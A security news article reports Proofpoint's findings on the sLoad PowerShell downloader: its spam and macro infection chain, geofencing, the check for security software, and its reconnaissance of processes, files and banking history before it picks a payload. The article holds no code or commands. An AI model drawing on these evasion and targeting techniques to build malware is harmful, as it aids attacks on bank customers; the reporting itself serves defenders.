Stealthy sLoad Downloader Performs Extensive Reconnaissance to Improve Quality of Infected Hosts

A new PowerShell downloader has been discovered – the sLoad downloader – which is being used in stealthy, highly targeted attacks in the United Kingdom and Italy. The sLoad downloader performs a wide range of checks to find out a great deal of information about the system on which it resides, before choosing the most appropriate malicious payload to deploy – if a payload is deployed at all.

The sLoad downloader was first identified in May 2018 when it was primarily being used to download the Ramnit banking Trojan, although more recently it has been delivering a much wider range of malicious payloads including Ursnif, PsiBot, DarkVNC, and Gootkit, according to security researchers at Proofpoint who have been analyzing the threat.

The malware is understood to be the work of a threat actor known as TA554 that Proofpoint has been tracking for more than a year. sLoad is being used in highly targeted attacks, mainly in the UK and Italy, although the group also frequently targets Canadian businesses.

sLoad is part of a growing breed of stealthy scripts that are being developed to perform stealthy attacks and improve the quality of infected hosts. One of the problems with infecting as many machines as possible is the attacks are noisy and are rapidly detected, giving security researchers plenty of time to analyze malware, add signatures to AV software, and develop patches.

While the spray and pray tactic of infecting as many end users as possible continues, especially by affiliates signed up to use ransomware-as-a-service, there has been a growing trend over the last few months of a much stealthier breed of malware – Malware that stays under the radar for longer and goes to great lengths to find out more about a system before attacks are launched.

Infection primarily occurs via spam emails, which are carefully crafted, written in the targeted country’s language, and include personalized information such as the target’s name and address to add credibility. The most common subjects and message themes are missed package deliveries and purchase orders, which are detailed in documents attached to the emails. Hyperlinks are also used to link to zip files containing the documents. The documents contain malicious macros that launch PowerShell scripts, which download the sLoad downloader.

The threat group extensively uses geofencing at all points in the infection chain. This restricts infection to specific locations as well as dictates what actions are taken when a host is infected. This is particularly important when the final payload is a banking Trojan. Banking Trojans target country-specific banks and use specific web injects for those attacks.

The sLoad downloader checks to determine if certain security processes are running on a system, and will exit if those processes are found. A list of all running processes will be collected and sent back to its C2 server along with details of Citrix-related .ICA files, Outlook files, and a wide range of other system information. sLoad will also check browsing histories to determine whether the user has previously visited banks that are being targeted and will report back on its findings.

If the infected device has been used to access a banking website that Ramnit is targeting, the banking Trojan will be downloaded, although other malware variants can also be delivered depending on the information discovered during the reconnaissance phase.

“sLoad, like other downloaders we have profiled recently, fingerprints infected systems, allowing threat actors to better choose targets of interest for the payloads of their choice,” wrote Proofpoint. “Downloaders, though, like sLoad, Marap and others, provide high degrees of flexibility to threat actors, whether avoiding vendor sandboxes, delivering ransomware to a system that appears mission critical, or delivering a banking Trojan to systems with the most likely return.”

Author: Richard Anderson

Richard Anderson is the Editor-in-Chief of